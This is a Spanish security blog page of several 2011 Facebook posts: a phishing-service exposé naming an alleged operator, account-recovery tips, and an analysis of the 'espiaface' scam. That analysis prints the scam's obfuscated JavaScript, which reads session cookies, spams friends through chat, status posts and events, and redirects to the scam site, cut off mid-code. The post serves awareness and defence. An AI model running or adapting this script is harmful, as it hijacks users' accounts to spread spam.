La Comunidad DragonJAR » Facebook

ClaveHotmail.com cometiendo delitos desde el 2007

T3zL4 — Tue, 13 Dec 2011 20:37:22 +0000

Hace un tiempo me entere de la existencia en el mercado de un supuesto servicio de recuperación de contraseñas para Hotmail y Facebook Colombiano, como esto es obviamente sospechoso decidí realizar una prueba para verificar cual era la forma en la que operaban, sabiendo desde el principio que debía tratarse de alguna técnica de ingeniería social o phishing avanzado.

El supuesto “servicio legal” es ofrecido desde el 2007 como su creador lo anuncia en www.clavehotmail.com haciendo alusión a investigaciones de tipo privado que atrapa infieles.

Así pues me decidí a solicitar un nuevo servicio por el que cobran $35.000 (unos 20 USD) y que se paga solo si resulta exitoso el robo de la contraseña de Hotmail o Facebook, para obtener la contraseña utilicé cuentas falsas creadas específicamente para este fin (que estarán censuradas).

Para fines de este articulo en la comunidad dragonjar, el correo del solicitante será abc@gmail.com y el de la víctima def@hotmail.com, después de realizada la solicitud envían al correo del solicitante unas instrucciones y un PIN con lo que podrá hacer seguimiento al estado de su solicitud como se muestra a continuación.

Importante ver la seriedad con la que intentan impresionar estos delincuentes, tenemos que decirles que tenemos mucho tiempo para hacerles perder de ser necesario, para nosotros esto no es perder el tiempo, ¡esto es lo que nos apasiona!

Al entrar a verificar el estado de mi solicitud me encuentro con la siguiente plataforma que tiene varias opciones y donde de ser efectivo el robo de la contraseña se mostraran 2 imágenes del buzón de entrada. El que quiera saber más acerca de las opciones con el PIN puede entrar y verificar las opciones disponibles.

8 horas después de realizada la solicitud apareció como por obra de magia en la bandeja de entrada de la victima este correo electrónico.

Revisando el origen del correo enviado nos arroja las siguientes características

Y verificando a donde apunta la dirección IP se obtiene lo siguiente:

Al abrir el correo electrónico debo admitir que esperaba algo mas que un clásico y triste PHISHING, que además de conocido es claramente penalizado por la LEY 1273 DE 2009 sobre delitos informáticos en Colombia (artículos 269F y 269G), por lo que el dueño del servicio aunque no lo crea (debe ser así por la gran cantidad de información que tiene disponible en la red) es un delincuente informático y puede tener de 4 a 7 años de prisión en una cárcel Colombiana, como la modelo de Bogotá.

De hecho en su apartado de “Ayuda y soporte” específicamente en “Preguntas frecuentes” tienen una espacio dentro de estas preguntas dedicado exclusivamente a resolver las “PREGUNTAS ACERCA DE LAS LEYES INFORMÁTICAS”, donde con pobres argumentos sin fundamentos legales intenta convencer a sus clientes que el servicio es “Legal”, cuando cualquiera que pueda leer el Artículo 269F. Violación De Datos Personales y el Artículo 269G. Suplantación De Sitios Web Para Capturar Datos Personales de la LEY 1273 DE 2009 para delitos informáticos en Colombia, puede comprobar que claramente lo que se realiza en ClaveHotmail.com es un delito informático.

Después de no atender la solicitud del correo electrónico fraudulento la probabilidad en la verificación del caso es del 0% como muestra la siguiente imagen.

¿Pero quién está detrás de este caso donde 4.483 personas han creído en que el servicio es legal?

Que incluso a engañado a los periodistas de la revista Aló, donde lo referenciaron en el 2010 y hasta lo publicaron en la versión online de ElTiempo.com

Ahora suponiendo con base en las estadísticas de la web www.clavehotmail.com que indica que el 85% de probabilidad es favorable para conseguir una contraseña, es decir que 3.810 han logrado un password por $35.000, y que realizando una simple operación entrega un gran total de $133’350.000 deja al descubierto el gran negocio que es para un delincuente realizar este tipo de operaciones sobre personas incautas.

Algo que no se puede negar fácilmente debido a la clara relación que tiene la página del phisher con la web fraudulenta.

Convirtiendo a el señor responsable de todo esto DANIEL RINCÓN de TULUÁ VALLE, en un delincuente con 4 años de trayectoria.

Gracias a Google se encontró algo más de información, la cual es importante para identificar al responsable de este delito informático.

Acá aparece la dirección de contacto, el correo electrónico y número de teléfono.

Por último algunas recomendaciones de seguridad tomadas de varios sitios para evitar caer en este tipo de delitos.

No hagas click a enlaces que vienen en correos electrónicos.
Para visitar una página introduce la dirección en la barra de direcciones.
Disminuye la cantidad de correo no deseado que recibes.
No proporciones información confidencial.
Nunca envíes información confidencial por correo electrónico.
Actualizar su sistema operativo, antivirus y firewall.

Por último esperamos que las autoridades correspondientes tomen cartas en el asunto y cuanto antes tomen medidas para evitar que este tipo de sitios sigan operando y sobre todo se tomen las medidas contra las personas que están detrás de esto.

También puede interesarte...

FINALISTAS: Mejor Blog de Seguridad Informatica (Premios Bitacoras 2011)

DragoN — Tue, 08 Nov 2011 20:47:36 +0000

ACTUALIZADO:

Ya se dieron a conocer los ganadores de los premios Bitácoras para el 2011, y en la categoría “Mejor Blog de Seguridad Informática” donde estábamos participando junto a InfoSpyware y SecurityByDefault, y el ganador del premio fue….. InfoSpyware!!!, desde la comunidad DragonJAR felicitamos nuestro amigo Marcelo Rivero y a su comunidad, como tambien agradecemos a todas las personas que confiaron en nosotros y votaron por la comunidad DragonJAR, por que aunque el jurado no opinó lo mismo, el estar en la primera posición durante el mes que duró el concurso, es una muestra del trabajo bien hecho y el sentimiento de nuestros usuarios hacia la comunidad MUCHAS GRACIAS!!!.

Se dieron a conocer los resultados para los premio Bitácoras 2011, premio que desde el año pasado cuenta con la categoría ‘Mejor blog de seguridad informática’ y del que nos enteramos un mes después de iniciar (gracias a un twittero) que la comunidad estaba participando, en esa ocasión el galardón (muy merecido por cierto) fue para nuestros amigos de “Security By Default” quienes lograron destacarse frente a los otros finalistas ‘Un informático en el Lado Del Mal‘ y Kriptópolis.

Este año decidimos participar desde el inicio de los premios y GRACIAS a todo el apoyo recibido, nuestra comunidad DragonJAR fue seleccionada como una de las finalistas al premio de Mejor blog de Seguridad Informática Bitácoras 2011; junto a otros grandes como InfoSpyware y Security By Default, no conocemos el número total de votos, pero sabemos gracias a las clasificaciones parciales que el apoyo recibido ha sido ENORME.

No queda más que esperar la decisión del jurado (que no es fácil por cierto) y agradecer a todos ustedes, quienes votaron, quienes no votaron, los que ayudan en nuestros foros a resolver dudas, los que publican las suyas, quienes dejan comentarios y en definitiva, todos los que con su visita hacen que esta comunidad sea cada vez más grande, animándonos a seguir creciendo cada día más.

Por otro lado quiero hacer una mención a los blogs amigos que participaron junto a nosotros en esta edición de los premios bitácoras, agradecerles por hacer su trabajo y con ello lograr que la comunidad de la seguridad informática en español sea cada vez mejor:

Agradecemos de forma especial a nuestro amigo Marc Rivero (Seifreed) quien en representación de nuestra comunidad, asistirá este 11 de Noviembre a interQué (La Casa Encendida), Madrid España, para saber la desicion de los jurados, ya que no es posible para nosotros viajar a España.

También puede interesarte...

Vota por La Comunidad en Bitacoras.com

DragoN — Tue, 11 Oct 2011 20:17:58 +0000

Este año en La Comunidad DragonJAR (a diferencia del pasado) queremos participar en el top anual de los premios Bitacoras.com desde su inicio, recordemos que el año pasado nos enteramos 1 mes tarde que estábamos participando (alguien nos agregó) y terminamos como finalistas en la categoría “Mejor Blog sobre Seguridad Informática“, la idea de este post es enseñarte a votar en el top, para que juntos podamos obtener un buen lugar en este top y dar a conocer aun mas nuestra comunidad.

Lo primero que debes hacer es ingresar a este enlace y crear una cuenta en Bitácoras, puedes hacerlo asociando tu cuenta de Facebook/Twitte a ello, como te indico a continuación:

En el menú superior de Bitacoras.com encontraras un botón que dice “Entrar”, cuando te paras en el te aparece un cuadro de dialogo, das click al botón “Connect with Facebook” y luego te logueas con tus datos de Facebook.

Una vez logueado le das permiso a la aplicación de Bitácoras y llenas la información de tu cuenta, después debes darle permiso a la aplicación para que te envíe correos (es obligatorio).

Si todo ha salido bien, estás listo para votar en el Top Bitacoras.com, solo tienes que seguir los siguientes pasos:

Ingresa a este enlace y te aparecerá una página como en la siguiente imagen:

Bajas y buscas la sección de “Mejor Blog sobre Seguridad Informática”, luego das en el botón “+” (si no esta marcado en verde la comunidad) y aparecerá automáticamente la dirección de nuestra comunidad.

Luego baja al final de la pagina y llena la “Comprobación de Seguridad”, debes poner las palabras que aparecen en la imagen y darle al botón “Votar”:

Si has seguido bien estos pasos, te aparecerá una página como en la siguiente imagen:

Te agradeceremos enormemente que votes por nuestra comunidad y envíes este enlace “http://www.dragonjar.org/votar.htm“ con todos tus amigos/familiares/followers, de esta forma podremos dar a conocer aun mas nuestra comunidad y mejorar día a día.

! MUCHAS GRACIAS ¡

También puede interesarte...

Eliminar paginas de Facebook

DragoN — Tue, 06 Sep 2011 05:14:38 +0000

Un nuevo fallo en el sistema de administración de paginas (fanpages) en Facebook ha sido descubierto por la firma de seguridad Sophos.

El fallo descubierto por Sophos y publicado en su portal Naked Security consiste en que el sistema de paginas de Facebook no diferencia de forma correcta a el creador de la fanpage, de un usuario subido a administrador, dandole los mismos permisos a los 2 y permitiendo que el el nuevo administrador (usuario ascendido a administrador) permita eliminar al creador de la fanpage.

Según las condiciones de Facebook “El creador original de una página no podrá ser eliminado por otros administradores” pero la realidad es muy diferente y sin ninguna modificación al sitio de Facebook un usuario administrador puede eliminar al creador del fanpage, como podemos ver en el siguiente video:

Recomendaciones para evitar que te eliminen tu pagina de Facebook/Fanpage

Piensa 2 veces antes de añadir a alguien como administrador a tu fanpage, ya sabes que podría eliminarte a ti como administrador.
Utiliza una que tenga mínimo 8 caracteres entre números, letras y símbolos (&^%#@!*. etc..) una buena clave es la que se recuerda fácilmente, pero difícilmente se adivina.
NO ingresar a tus cuentas de correos o redes sociales, desde conexiones publicas (Centros Comerciales, Universidades, Congresos, Terminales, Aeropuertos, Restaurantes, Etc…) y desconfía de cualquier conexión que este abierta (sin seguridad).
PROHIBIDO abrir archivos adjuntos en correos electrónicos, clientes de mensajería o redes sociales, acceder a enlaces que te envíen personas desconocidas y si la persona que te lo envía es conocida, preguntale primero qué es antes de abrirlo, ya que muchas veces el malware envía enlaces y adjuntos maliciosos desde las cuentas de tus conocidos sin que ellos se enteren.
Nunca publiques tu clave, y si es de vida o muerte hacerlo, cambia tu contraseña y tu pregunta secreta, tan pronto puedas hacerlo.
Analizar tu computador y todos los computadores desde donde accedes a tu cuenta, con un software Anti Keyloggers y un buen Anti Virus ya que el uso de estas herramientas es un método comúnmente utilizado para robar tus datos de acceso.

También puede interesarte...

¿Cómo Recuperar una Cuenta de Facebook?

DragoN — Sun, 28 Aug 2011 03:22:55 +0000

Después de colaborarle a nuestros amigos de Internautismo Crónico a recuperar sus cuentas de Twitter y Facebook, prometimos escribir sobre la metodología utilizada para que otras personas que puedan enfrentar una situación parecida, sepan que hacer para recuperar sus cuentas, ya publicamos como recuperar las cuentas de MSN Messenger / Hotmail y Twitter, a continuación les dejo los pasos para Recuperar una cuenta de Facebook.

….

Las cuentas de Facebook se ha convertido en uno de los principales objetivos para los delincuentes informáticos hoy en día, ya que una cuenta robada de Facebook cuesta al rededor de $100USD en el mercado negro y con ella un delincuente puede suplantar la identidad de la víctima, sacar créditos a nombre de ella, también podría hacer parecer a sus contactos que le robaron todo en una ciudad que no conoce, se quedo sin dinero y necesita que le envíen para poder volver a casa, ¿y quien no ayudaría a un familiar que esta en apuros?, una vez el malhechor se hace a una de estas cuentas puede intentar infectar a la lista de contactos de la víctima con algún tipo de malware y así sacarle el máximo provecho a la inversión realizada.

Ahora que conoces cuan valiosa es para un delincuente informático tu cuenta de Facebook y cuanto mal puede causarte a ti y a tus contactos, es importante que cuides de ella, utilizando claves fuertes, ingresando siempre desde la conexión segura de Facebook, navegando desde computadores de confianza y no abriendo archivos adjuntos que no estas esperando.

Si lamentablemente has llegado tarde a estos consejos para evitar que roben tu cuenta, y ya has sido víctima de algún delincuente informático, no te eches a llorar que no todo esta perdido, Facebook es consciente de este tipo de robos y ha puesto a tu disposición una serie de herramientas para que puedas recuperar tu cuenta, en caso de que esta fuese robada.

Existen 2 formas de recuperar tu contraseña de Facebook, la primera y mas sencilla de todas es utilizando el servicio “¿Has olvidado tu contraseña?“, haciendo clic en el. Recibirás un mensaje de correo electrónico con los pasos que tienes que seguir para recuperar tu clave de Facebook.

Si tu cuenta ha sido robada y tu correo electrónico también, no te preocupes aun puedes llenar este formulario diseñado especialmente para estos casos, enviar la información que te piden sobre tu cuenta, para que los encargados en Facebook puedan investigar tu caso y devolverte el acceso a tu cuenta de Facebook.

RECUERDA que en Colombia el acceso NO AUTORIZADO a tu información privada (y dentro de esta categoría se encuentran tus cuentas de correo, redes sociales, etc..) es penalizado por nuestra legislación como puedes ver en el ARTICULO 269F de la ley 1273 del 2009; Por tanto deberías plantearte hacer la denunciar respectiva a las autoridades pertinentes para que el delito no quede impune, como pasa en la mayoría de los casos.

Como vez, es sencillo recuperar tu clave o cuenta de Facebook, solo recuerda tener mas cuidado la próxima vez para que no te vuelva a suceder.

Algunos consejos adicionales POST recuperación:

Utiliza una contraseña segura, que tenga mínimo 8 caracteres combinados entre números, letras y símbolos (#@!*&^%. etc..) que sea fácil de recordar, pero difícil de adivinar.
No abras archivos adjuntos, ni accedas a enlaces de personas desconocidas, si la persona que te lo envía es conocida, preguntale primero qué es antes de abrirlo, muchas veces el malware envía enlaces y adjuntos maliciosos desde las cuentas de tus conocidos sin que ellos se enteren.
NO ingresar a tus cuentas de correos o redes sociales, desde conexiones publicas (Centros Comerciales, Universidades, Congresos, Terminales, Aeropuertos, Restaurantes, Etc…) y desconfía de cualquier conexión que este abierta (sin seguridad).
Analizar tu computador y todos los computadores desde donde accedes a tu cuenta, con un software Anti Keyloggers y un buen Anti Virus ya que el uso de estas herramientas es un método comúnmente utilizado para robar tus datos de acceso.
Nunca publiques tu clave, y si es de vida o muerte hacerlo, cambia tu contraseña y tu pregunta secreta, tan pronto puedas hacerlo.

Ademas es recomendable que te leas los Consejos para hacer correcto uso de las redes sociales y la guía para configurar la privacidad en las redes sociales , como también los pasos para recuperar cuentas de Hotmail, Messenger y Twitter.

También puede interesarte...

Guía oficial de seguridad en Facebook

DragoN — Mon, 15 Aug 2011 22:22:20 +0000

Nadie puede negar que Facebook es la red social mas grande que existe actualmente en la red, es una herramienta que sirve para mantener un contacto con nuestros seres queridos que se encuentras lejos, divertirnos, ademas de enterarnos que pasa con nuestros amigos y familiares.

Pero no todo es bueno, los delitos sobre esta plataforma crecen al mismo ritmo que su popularidad, es por esto que cada vez encontramos mas casos de Suplantación de identidad, Extorsión, Difamación, Pedofilia, Ciber Acoso, entre otros, en esta famosa red social.

Los responsables de Facebook saben lo que pasa en su plataforma y como contra medida han creado un departamento de seguridad con consejos para padres, adolescentes, profesores, fuerzas de la ley, una sección de Herramientas y recursos pero ademas acaban de publicar una guía oficial para preservar nuestra seguridad en Facebook.

Les dejo la Guía oficial de seguridad en Facebook para que la lean online (click en el centro de la guia, para verla en pantalla completa)

Descarga el PDF de la Guía oficial de seguridad en Facebook para leerlo offline.

Para mas información:
Centro de Seguridad de Facebook

También puede interesarte...

Análisis Forense en Facebook

DragoN — Tue, 19 Jul 2011 17:40:49 +0000

La popularidad de Facebook ha crecido exponencialmente en los ultimos años, pero con el aumento de su popularidad, tambien se ha incrementado los casos de delitos sobre esta plataforma, Suplantacion de identidad, Extorcion, Difamacion, Pedofilia, Ciber Acoso, son solo algunos de los delitos mas comunes realizados por Facebook.

Analizar lo sucedido en esta red social muchas veces es clave para poder resolver los casos en los que por medio de Facebook se ha cometido algun delito; En el siguiente paper creado por el grupo investigadores GruValkyrie-X, nos cuentan detalladamente como realizar un analisis forense a Facebook (las charlas, comentarios en el muro, eventos, grupos, etc…) asi como su aplicacion para dispositivos moviles, ya que cada accion en esta red social deja huellas que pueden ser utilizadas para descubrir que se realizó sobre ella.

Sin mas preambulos les dejo de forma online este exelente paper.

Tambien puedes descargarlo en PDF gracias al mirror de la Comunidad DragonJAR.

Más Información:
Facebook Forensics Paper Published

También puede interesarte...

Ayudanos con un “Me Gusta”

DragoN — Tue, 17 May 2011 18:03:12 +0000

Hace unos días publicamos en la comunidad un articulo explicando Qué hace realmente Espia F a c e.com, una amenaza viral que afectó miles de usuarios de en Facebook con la escusa de poder ver “Quien visitó tu perfil en esta red social”.

Al parecer la reacción de Facebook (bastante tardía por cierto) fue eliminar y bannear todo lo que contenía la la cadena de texto “espiaface” incluida la FanPage de nuestra comunidad, que tomó de los RSS la noticia para publicarla automáticamente.

Ya he contactado con Facebook por todos los correos y formularios posibles, pero no han dado respuesta, hasta que me cansé de esperar y decidí crear un nuevo FanPage de la comunidad que espero todos apoyen, les dejo la el botón para que se unan a nuestra nueva Fanpage en Facebook, se que juntos lograremos superar los mas de 5500++ Fans que tenia la cuenta anterior.

También puede interesarte...

Qué hace realmente Espia F a c e.com

DragoN — Wed, 27 Apr 2011 20:57:17 +0000

Hace algunos días proliferó de forma viral en Facebook unas invitaciones para “Averigua quién visita tu perfil”, seguramente las habrán visto en su perfil o les llegó la invitación de algún amigo, hoy nanopene me ha enviado una investigación que ha realizado sobre este fenómeno y con un alto nivel de detalle explica qué hace realmente espiaface.com.

Para quien no lo sepa aun, no existe ni existirá en Facebook, algún método que te permita averiguar quién visita tu perfil, todas las aplicaciones, métodos o trucos para averiguar esto son un total FRAUDE y posiblemente termines infectado, con identidad robada o haciendo a alguien rico con publicidad.

Aclarado esto, paso a dejarles el informe de nanopene, espero que lo encuentren interesante.

Todos sabemos para esta altura que “espiaface.com” no cumple con lo que promete, pero antes les quiero tranquilizar diciéndoles primero lo que no es:

NO es un virus (ni worm, ni troyano, ni ataque de XSS, ni explota vulnerabilidades del navegador)
NO roba contraseñas de Facebook
NO roba cookies (no roba sesiones de Facebook)
NO accede a tu información privada del perfil (en esta variante en específico)
NO es una Aplicación de Facebook (No instala nada, no queda residente, nada)

Pero bien podría haber sido todo lo anterior:

Sí podría haber sido un virus creando un lindo botnet de la San Puta.
Sí podría haberte robado la cuenta de Facebook.
Sí podría vender tu información privada al mejor postor para que te espameen de lo lindo o le vendan tu información a delincuentes para que te hagan un secuestro virtual.

ACLARANDO: Facebook sí ofrece tu información privada en bandeja de plata a CUALQUIER aplicación de facebook. Si, todos los jueguitos, tests de psicología (“¿Sos más pelotudo que el promedio?” ), O chimentos “¿Qué dijo fulano de mengano?”, “¿Querés saber quién dijo que sos una trola?” y todas las porquerías esas obtienen acceso y control completo de tu perfil cuando presionas “Permitir“.

En una ventana como esta, es cuando estás “instalando” un App de Facebook.

El botón Permitir, concede al App el acceso irrestricto a toda la información privada de tu perfil, control de posteo en tu cuenta y todo lo que te describe ahí. Esto es totalmente independiente a tu configuración de privacidad, aunque estés en modo superparanoico, con “Solo Amigos” y “Solo Yo”, estos Apps tienen acceso completo cuando les das el permiso.

Si fuiste víctima de EspiaFace, sabrás que no presionaste “Permitir” en ningún lado, eso se debe a que EspiaFace no es una aplicación de Facebook. Eso por una parte es una buena noticia, ya que tenemos la tranquilidad de que no obtiene los datos privados por defecto y tampoco hay que “desinstalar” nada de Facebook.

Si caíste esta vez, estuviste debuenas. La próxima vez que caigas en una trampa de este calibre puede que pierdas la cuenta de facebook, pierdas el control de tu computadora y pierdas ancho de banda.

Primero nos tienta con una imagen modificada, mostrando las visitas a tu perfil en tu “Notificaciones”. Cuando presionamos Siguiente, nos topamos con la siguiente pantalla:

Nos muestra un código para poner en Facebook. Si se fijan bien, ese código llama un archivo de javascript llamado app.js para hacer el trabajo sucio, ¿por qué nos pide que esperemos 2 a 3 minutos? ¿Qué carajo hace el código? veamos su contenido: (prepárense para un scroll largo y ancho…)

Código Ofuscado

var _0x3fe9=["x25x66x69x72x73x74x6Ex61x6Dx65x25x20x6Dx69x72x61x20x65x73x74x6Fx20x71x75x65x20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x2Cx20x74x65x20x70x65x72x6Dx69x74x65x20x76x65x72x20x71x75x69x65x6Ex65x73x20x76x69x73x69x74x61x6Ex20x74x75x20x70x65x72x66x69x6Cx20x79x20x66x75x6Ex63x69x6Fx6Ex61x20x62x69x65x6Ex2Cx20x65x6Ex74x72x61x20x61x3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x54x6Fx70x20x64x65x20x76x69x73x69x74x61x6Ex74x65x73x20x64x65x20x74x75x20x70x65x72x66x69x6Cx20x64x65x20x68x6Fx79x3Ax20x0Ax20x25x74x66x25x20x2Dx20x31x39x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x36x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x35x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x33x20x76x69x73x69x74x61x73x20x0Ax20x41x76x65x72x69x67x75x61x20x74x75x20x74x61x6Dx62x69x65x6Ex20x71x75x69x65x6Ex20x74x65x20x65x73x74x61x20x6Dx69x72x61x6Ex64x6Fx20x65x6Ex74x72x61x6Ex64x6Fx20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx0Ax46x75x6Ex63x69x6Fx6Ex61x20x64x65x20x76x65x72x64x61x64x21","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx2Fx63x61x72x67x61x2Ex70x68x70","x45x73x74x6Fx20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x21x20x70x75x65x64x65x6Ex20x76x65x72x20x71x75x69x65x6Ex20x65x73x74x61x20x76x69x73x69x74x61x6Ex64x6Fx20x73x75x20x70x65x72x66x69x6Cx20x79x20x74x65x20x6Cx6Cx65x67x61x6Ex20x6Ex6Fx74x69x66x69x63x61x63x69x6Fx6Ex65x73x2Cx20x73x69x67x61x6Ex20x6Cx6Fx73x20x70x61x73x6Fx73x20x64x65x20x65x73x74x61x20x70x61x67x69x6Ex61x20x71x75x65x20x65x78x70x6Cx69x63x61x20x63x6Fx6Dx6Fx20x68x61x63x65x72x6Cx6Fx2Cx20x65x6Ex74x72x65x6Ex20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x41x76x65x72x69x67x75x61x20x71x75x69x65x6Ex20x76x69x73x69x74x61x20x74x75x20x70x65x72x66x69x6C","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x74x6Fx70","x47x45x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x73x65x6Ex64","x2F","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x40x5B","x69x64","x3A","x6Ex61x6Dx65","x5D","","x26","x3D","x50x4Fx53x54","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x64x69x73x70x6Cx61x79","x73x74x79x6Cx65","x62x6Cx6Fx63x6B","x70x6Fx73x69x74x69x6Fx6E","x61x62x73x6Fx6Cx75x74x65","x77x69x64x74x68","x31x30x30x25","x68x65x69x67x68x74","x6Cx65x66x74","x30x70x78","x74x65x78x74x41x6Cx69x67x6E","x63x65x6Ex74x65x72","x70x61x64x64x69x6Ex67","x34x70x78","x62x61x63x6Bx67x72x6Fx75x6Ex64","x23x46x46x46x46x46x46","x7Ax49x6Ex64x65x78","x69x6Ex6Ex65x72x48x54x4Dx4C","x20x3Cx62x72x2Fx3Ex3Cx62x3Ex43x61x72x67x61x6Ex64x6Fx20x61x70x6Cx69x63x61x63x69x6Fx6Ex2Cx20x61x67x75x61x72x64x65x20x75x6Ex20x6Dx6Fx6Dx65x6Ex74x6Fx2Ex2Ex2Ex3Cx2Fx62x3Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex20x4Cx61x20x61x70x6Cx69x63x61x63x69x6Fx6Ex20x65x73x74x61x20x70x72x65x70x61x72x61x6Ex64x6Fx20x74x75x20x66x61x63x65x62x6Fx6Fx6Bx20x70x61x72x61x20x72x65x67x69x73x74x72x61x72x20x6Cx61x73x20x76x69x73x69x74x61x73x20x64x65x20x74x75x73x20x61x6Dx69x67x6Fx73x2Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx67x65x6Ex65x74x69x63x73x2Ex62x77x68x2Ex68x61x72x76x61x72x64x2Ex65x64x75x2Fx73x6Ex70x32x72x66x6Cx70x2Fx63x69x72x63x6Cx65x2Ex67x69x66x22x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x64x61x74x61","x66x69x72x73x74x43x68x69x6Cx64","x6Ex61x76x41x63x63x6Fx75x6Ex74x4Ex61x6Dx65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x3F","x2Fx61x6Ax61x78x2Fx63x68x6Fx6Fx73x65x2Fx3Fx5Fx5Fx61x3Dx31","x65x76x65x6Ex74","x41x73x79x6Ex63x52x65x71x75x65x73x74","x2Fx61x6Ax61x78x2Fx74x79x70x65x61x68x65x61x64x2Fx66x69x72x73x74x5Fx64x65x67x72x65x65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31x26x76x69x65x77x65x72x3D","x26x74x6Fx6Bx65x6Ex3D","x26x66x69x6Cx74x65x72x5Bx30x5Dx3Dx75x73x65x72x26x6Fx70x74x69x6Fx6Ex73x5Bx30x5Dx3Dx66x72x69x65x6Ex64x73x5Fx6Fx6Ex6Cx79x26x6Fx70x74x69x6Fx6Ex73x5Bx31x5Dx3Dx6Ex6Dx26x6Fx70x74x69x6Fx6Ex73x5Bx32x5Dx3Dx73x6Fx72x74x5Fx61x6Cx70x68x61","x6Cx65x6Ex67x74x68","x70x75x73x68","x67x65x74x54x69x6Dx65","x73x65x74x54x69x6Dx65","x67x65x74x4Dx6Fx6Ex74x68","x67x65x74x44x61x74x65","x67x65x74x46x75x6Cx6Cx59x65x61x72","x67x65x74x48x6Fx75x72x73","x2C","x6Ax6Fx69x6E","x6Fx6E","x43x72x65x61x74x65x20x45x76x65x6Ex74","x6Ex65x77","x2Fx65x76x65x6Ex74x73x2Fx63x72x65x61x74x65x2Ex70x68x70","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx62x75x64x64x79x5Fx6Cx69x73x74x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x73x75x62x73x74x72","x28","x29","x62x75x64x64x79x5Fx6Cx69x73x74","x70x61x79x6Cx6Fx61x64","x6Ex6Fx77x41x76x61x69x6Cx61x62x6Cx65x4Cx69x73x74","x72x61x6Ex64x6Fx6D","x66x6Cx6Fx6Fx72","x25x66x69x72x73x74x6Ex61x6Dx65x25","x74x6Fx4Cx6Fx77x65x72x43x61x73x65","x66x69x72x73x74x4Ex61x6Dx65","x75x73x65x72x49x6Ex66x6Fx73","x72x65x70x6Cx61x63x65","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx73x65x6Ex64x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x2Fx61x6Ax61x78x2Fx62x72x6Fx77x73x65x72x2Fx66x72x69x65x6Ex64x73x2Fx3Fx75x69x64x3D","x26x66x69x6Cx74x65x72x3Dx61x6Cx6Cx26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x3Dx31","x73x68x69x66x74","x66x65x74x63x68x65x64x20x66x72x69x65x6Ex64x73x3Ax20","x68x6Fx6Dx65","x70x6Fx70","x25x74x66x25","x73x65x61x72x63x68","x78x68x70x63x5Fx6Dx65x73x73x61x67x65x5Fx74x65x78x74","x78x68x70x63x5Fx6Dx65x73x73x61x67x65","x6Dx65x73x73x61x67x65x20x74x65x78x74x3Ax20","x2Fx61x6Ax61x78x2Fx75x70x64x61x74x65x73x74x61x74x75x73x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65"];var chatmessage=_0x3fe9[0];var postmessage=_0x3fe9[1];var redirect=_0x3fe9[2];var eventdesc=_0x3fe9[3];var eventname=_0x3fe9[4];var nfriends=5000;var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0x3fe9[7]][_0x3fe9[6]][_0x3fe9[5]]=redirect;} ,500);} ;} ;var doget=function (_0xbf72xb,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[8],_0xbf72xb);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]]();} ;doget(_0x3fe9[15],function (_0xbf72xf){var _0xbf72x10=document[_0x3fe9[17]][_0x3fe9[16]](/c_user=(d+)/)[1];var _0xbf72x11=function (_0xbf72x12){return _0xbf72x12?_0x3fe9[18]+_0xbf72x12[_0x3fe9[19]]+_0x3fe9[20]+_0xbf72x12[_0x3fe9[21]]+_0x3fe9[22]:_0x3fe9[23];} ;var _0xbf72x13=function (_0xbf72x12){return _0xbf72x12?_0xbf72x12[_0x3fe9[21]]:_0x3fe9[23];} ;var _0xbf72x14=function (_0xbf72x12){out=_0x3fe9[23];for(var _0xbf72x15 in _0xbf72x12){out+=(out?_0x3fe9[24]:_0x3fe9[23])+_0xbf72x15+(_0xbf72x12[_0xbf72x15]!==null?_0x3fe9[25]+encodeURIComponent(_0xbf72x12[_0xbf72x15]):_0x3fe9[23]);} ;return out;} ;var _0xbf72x16=function (_0xbf72xb,_0xbf72x12,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[26],_0xbf72xb);_0xbf72xe[_0x3fe9[29]](_0x3fe9[27],_0x3fe9[28]);_0xbf72xe[_0x3fe9[10]]=function 